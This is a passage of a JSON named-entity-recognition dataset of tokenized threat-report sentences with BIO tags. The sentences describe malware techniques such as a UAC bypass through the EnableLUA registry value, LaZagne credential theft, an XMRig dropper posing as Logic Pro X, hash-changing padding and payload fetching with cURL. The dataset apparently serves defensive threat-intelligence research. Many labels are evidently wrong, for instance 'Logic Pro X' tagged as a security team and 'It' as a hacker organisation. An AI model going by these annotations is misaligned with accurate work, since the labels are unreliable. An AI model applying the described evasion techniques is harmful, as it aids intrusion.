[ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reverse", - "proxy", - "tool" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "actor", - "uploaded", - "the", - "fast", - "reverse", - "proxy", - "(FRP)", - "binary" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "One", - "of", - "the", - "main", - "initial", - "access", - "vector", - "is", - "exploitation", - "of", - "publicly", - "exposed", - "web", - "services." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Initial", - "Compromise", - "Through", - "Exploiting", - "Publicly", - "Facing", - "Applications" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "primarily", - "focuses", - "on", - "four", - "different", - "known", - "remote", - "code", - "execution", - "(RCE)", - "vulnerabilities", - "during", - "their", - "operations:•", - "CVE-2023-21839", - "Oracle", - "WebLogic", - "Server", - "RCE", - "[13]•", - "CVE-2021-3129", - "Laravel", - "debug", - "mode", - "RCE", - "[14]•", - "CVE-2020-2551", - "Oracle", - "WebLogic", - "RCE", - "[15]•", - "CVE-2021-44228", - "Apache", - "Log4j", - "[16]" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "victim", - "IP", - "address", - "was", - "publicly", - "serving", - "a", - "web", - "service", - "that", - "contained", - "a", - "phpMyAdmin", - "database." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actor", - "primarily", - "focused", - "on", - "exploiting", - "four", - "different", - "remote", - "code", - "execution", - "(RCE)", - "vulnerabilities", - "to", - "target", - "web", - "services" - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypting", - "and", - "exporting", - "browser", - "data" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decryption", - "key", - "for", - "the", - "ZIP", - "folder", - "and", - "access", - "the", - "tool" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "distributed", - "inside", - "an", - "encrypted", - "ZIP", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "executed", - "the", - "\"tasklist", - "/SVC\"", - "command", - "to", - "list", - "all", - "running", - "processes", - "on", - "the", - "victim", - "device." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deleted", - "the", - "LaZagne", - "binary", - "after", - "execution", - "to", - "avoid", - "detection", - "from", - "the", - "user's", - "side." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "actor", - "leveraged", - "ONE-FOX", - "-", - "a", - "collection", - "of", - "pentest", - "tools", - "-", - "to", - "copy", - "binaries", - "from", - "actor´s", - "system", - "to", - "the", - "victim." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Recording", - "keystrokes", - "in", - "real", - "time", - "with", - "offline", - "logging", - "available" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Downloading", - "files", - "remotely" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "the", - "dropper", - "then", - "downloads", - "a", - "custom", - "XMRig", - "miner" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "script", - "to", - "download,", - "configure", - "and", - "execute" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "the", - "XMRig", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "pulls", - "the", - "XMRig", - "payload" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "generating", - "a", - "script", - "to", - "decode", - "the", - "legitimate", - "Mach-O", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "is", - "decoded", - "and", - "unarchived" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "value", - "is", - "decoded" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Logic", - "Pro", - "X", - "dropper", - "binary", - "is", - "deleted", - "with", - "the", - "/tmp/", - "bundle" - ], - "ner_tags": [ - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "In", - "order", - "to", - "unpack", - "the", - "legitimate", - "binary," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "binary", - "unpacks", - "a", - "customized", - "Mach-O" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "previously", - "written", - "Base64", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Files", - "are", - "dropped/downloaded", - "as", - "Base64-encoded", - "archives." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "first", - "deletes", - "itself", - "from", - "the", - "disk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "removes", - "any", - "files" - ], - "ner_tags": [ - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "deleted", - "every", - "time" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "script", - "then", - "removes", - "any", - "files" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "script", - "removes", - "the", - "i2pd", - "Mach-O", - "file", - "from", - "the", - "disk." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Even", - "though", - "the", - "scripts", - "produce", - "many", - "on-disk", - "artifacts,", - "the", - "dropper", - "and", - "scripts", - "are", - "quick", - "to", - "remove", - "them" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Files", - "are", - "deleted", - "after", - "use." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "proxy", - "the", - "miner’s", - "network", - "communications." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "mining", - "proxy." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "usage", - "of", - "a", - "proxy", - "allows", - "authors", - "to", - "control", - "all", - "of", - "their", - "mining", - "implants", - "and", - "their", - "target", - "pools", - "via", - "a", - "centralized", - "console" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "mining", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "command", - "line", - "arguments" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "executed", - "as", - "a", - "command", - "line", - "argument" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "padded", - "i2pd", - "Mach-O", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "pads", - "the", - "resulting", - "Mach-O", - "with", - "a", - "random", - "number", - "of", - "\\x00", - "bytes" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "binaries", - "are", - "padded", - "with", - "a", - "random", - "number", - "of", - "zero", - "bytes", - "to", - "change", - "its", - "hash", - "and", - "expand", - "its", - "size." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "is", - "padded", - "with", - "a", - "random", - "number", - "of", - "\\x00", - "bytes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "user", - "will", - "continue", - "to", - "execute", - "the", - "dropper" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "dropper", - "is", - "executed", - "by", - "the", - "user." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "As", - "long", - "as", - "the", - "dropper", - "successfully", - "launches", - "its", - "legitimate", - "application" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "dropper", - "bundle", - "in", - "the", - "applications", - "folder", - "appears", - "legitimate," - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "authors", - "cleverly", - "utilized", - "these", - "legitimate", - "dependencies", - "via", - "symbolic", - "links", - "when", - "dynamically", - "creating", - "the", - "legitimate", - "bundle", - "in", - "the", - "temp", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "dropper", - "is", - "installed", - "into", - "a", - "legitimate", - "file", - "path,", - "posing", - "as", - "the", - "legitimate", - "application." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilize", - "legitimate", - "file", - "paths", - "to", - "mask", - "their", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "order", - "to", - "appear", - "as", - "a", - "working", - "copy", - "of", - "Logic", - "Pro", - "X,", - "the", - "dropper", - "contains", - "a", - "legitimate", - "copy", - "of", - "the", - "lure", - "application" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "mirrored", - "bundle", - "contains", - "the", - "legitimate", - "application", - "instead", - "of", - "the", - "dropper", - "binary." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "mirror", - "all", - "directories", - "found", - "in", - "/Applications/Logic", - "Pro", - "X.app/Contents", - "and", - "/Applications/Logic", - "Pro", - "X.app/Contents/MacOS", - "to", - "their", - "respective", - "/tmp/", - "locations" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malicious", - "dropper", - "contains", - "a", - "legitimate", - "version", - "of", - "the", - "software", - "and", - "executes", - "it", - "to", - "give", - "the", - "illusion", - "of", - "a", - "properly", - "behaving", - "application." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "check", - "using", - "pgrep", - "for", - "Activity", - "Monitor", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "proxy", - "server", - "is", - "located", - "on", - "the", - "I2P", - "network", - "at", - "the", - "destination", - "of", - "the", - "pool", - "tunnel" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "config", - "via", - "the", - "XMRig", - "miner’s", - "native", - "API." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "By", - "modifying", - "the", - "below", - "registry", - "value", - "EnableLUA", - "to", - "“0”" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "ConsentPromptBehaviorAdmin", - "key", - "has", - "been", - "set", - "to", - "“0”,", - "indicating", - "that", - "the", - "behavior", - "of", - "the", - "consent", - "prompt", - "for", - "actions", - "requiring", - "administrator", - "privileges", - "has", - "been", - "modified" - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ransomware", - "modifies", - "specific", - "registry", - "values" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "malware", - "aims", - "to", - "deactivate", - "User", - "Account", - "Control", - "(UAC)", - "on", - "the", - "target", - "system" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "UAC", - "BYPASS" - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg" - ] - }, - { - "tokens": [ - "to", - "disable", - "User", - "Access", - "Control", - "(UAC),", - "a", - "security", - "feature", - "in", - "Windows" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "By", - "deactivating", - "UAC,", - "the", - "ransomware", - "gets", - "elevated", - "privileges", - "without", - "requiring", - "user", - "permission", - "or", - "administrator", - "credentials" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "bypassing", - "UAC" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ransomware", - "uses", - "the", - "FindFirstVolumeW()", - "and", - "FindNextVolumeW()", - "API", - "functions" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "using", - "the", - "FindFirstFileW()", - "and", - "FindNextFileW()", - "API", - "functions." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "leverages", - "various", - "functions", - "from", - "the", - "CryptoAPI,", - "including", - "CryptAcquireContextW(),", - "CryptImportKey(),", - "CryptSetKeyParam(),", - "and", - "CryptEncrypt()." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "using", - "the", - "MoveFileExW()", - "API", - "function," - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "search", - "and", - "identify", - "accessible", - "volumes", - "on", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "proceeds", - "to", - "identify", - "files", - "and", - "directories", - "for", - "encryption", - "by", - "iterating", - "through", - "them" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "function", - "scans", - "a", - "specified", - "path", - "by", - "finding", - "all", - "files", - "within", - "the", - "given", - "directory", - "and", - "its", - "subdirectories." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "iterates", - "over", - "each", - "volume", - "to", - "search", - "for", - "specific", - "files", - "related", - "to", - "virtual", - "machines." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "function", - "scans", - "VM", - "volumes", - "on", - "an", - "ESXi", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scanning", - "files", - "in", - "a", - "specified", - "or", - "generic", - "path" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "then", - "iterates", - "over", - "each", - "volume", - "to", - "find", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "command", - "uses", - "the", - "Windows", - "Management", - "Instrumentation", - "Command-line", - "(WMIC)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "This", - "function", - "is", - "responsible", - "for", - "deleting", - "all", - "files", - "and", - "directories", - "in", - "the", - "user’s", - "trash", - "folder." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "passing", - "the", - "file", - "path", - "to", - "be", - "encrypted", - "as", - "an", - "argument." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "removes", - "log", - "files", - "and", - "temporary", - "files", - "from", - "the", - "root", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "also", - "deletes", - "the", - "ransomware,", - "script", - "file,", - "and", - "ransom", - "note", - "(index.html),", - "ensuring", - "that", - "no", - "evidence", - "remains", - "on", - "the", - "compromised", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "uses", - "the", - "esxcli", - "command", - "to", - "list", - "all", - "VM", - "processes" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "configuring", - "autorun", - "entries," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "through", - "legitimate", - "remote", - "access", - "software", - "such", - "as", - "AnyDesk" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "invoked", - "the", - "wave", - "2", - "ransomware", - "immediately", - "from", - "the", - "command", - "line" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "both", - "use", - "CreateFile", - "and", - "WriteFile", - "APIs" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "using", - "DeviceControl", - "API", - "methods" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "use", - "of", - "the", - "same", - "DeviceControl", - "API", - "methods" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DeviceControl", - "API", - "methods" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DeviceControl", - "API", - "methods" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ransomware", - "attempts", - "to", - "decrypt" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RC4", - "key", - "for", - "decryption" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "RC4", - "decryption", - "method", - "uses", - "CryptoAPI", - "(CryptDecrypt)", - "instead", - "of", - "the", - "usual", - "substitution", - "box", - "method" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "embedded", - "scripts" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Embedding", - "of", - "EldoS", - "RawDisk", - "driver", - "inside", - "the", - "wiper", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actor", - "embedded", - "the", - "signed", - "raw", - "disk", - "driver", - "in", - "the", - "wiper", - "executable" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "raw", - "disk", - "driver", - "was", - "embedded", - "inside", - "the", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "download", - "and", - "launch", - "of", - "a", - "suspicious", - "batch", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actor", - "introduced", - "a", - "downloader", - "to", - "fetch", - "and", - "spawn", - "the", - "next", - "stage", - "payload" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malicious", - "document", - "connects", - "to", - "the", - "remote", - "server", - "and", - "downloads", - "the", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "install", - "additional", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "then", - "returned", - "18", - "hours", - "later", - "to", - "install", - "further", - "malware" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "when", - "the", - "malicious", - "Word", - "document", - "opens", - "it", - "fetches", - "the", - "next", - "payload", - "from", - "the", - "remote", - "server:" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "fetched", - "an", - "additional", - "script", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "different", - "method", - "of", - "fetching", - "and", - "executing", - "the", - "next", - "stage", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "file", - "downloaded", - "from", - "the", - "internet," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "fetch", - "the", - "next", - "stage", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "the", - "fetched", - "data", - "by", - "cURL", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Fetch", - "the", - "payload", - "with", - "cURL", - "command" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "fetching", - "the", - "next", - "stage", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "fetching", - "a", - "remote", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "fetches", - "a", - "payload", - "from", - "the", - "embedded", - "URL", - "and", - "loads", - "it." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "launch", - "of", - "a", - "suspicious", - "batch", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Batch", - "script" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "operator", - "executed", - "several", - "Windows", - "commands" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "batch", - "file" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file", - "name" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "scriptlet", - "of", - "the", - "batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "cmd.exe\"", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd.exe\"", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Windows", - "Batch", - "file" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "script", - "is", - "for", - "executing", - "the", - "PowerShell", - "script", - "via", - "a", - "Windows", - "scheduled", - "task" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "displays", - "a", - "warning", - "message", - "when", - "the", - "user", - "tries", - "to", - "open", - "a", - "file", - "downloaded", - "from", - "the", - "internet." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "strategy", - "to", - "persuade", - "the", - "victim", - "to", - "execute", - "the", - "malicious", - "shortcut", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "executed", - "when", - "the", - "victim", - "double-clicked", - "on", - "the", - "shortcut", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "executable", - "ieinstal.exe", - "was", - "used", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "one", - "victim", - 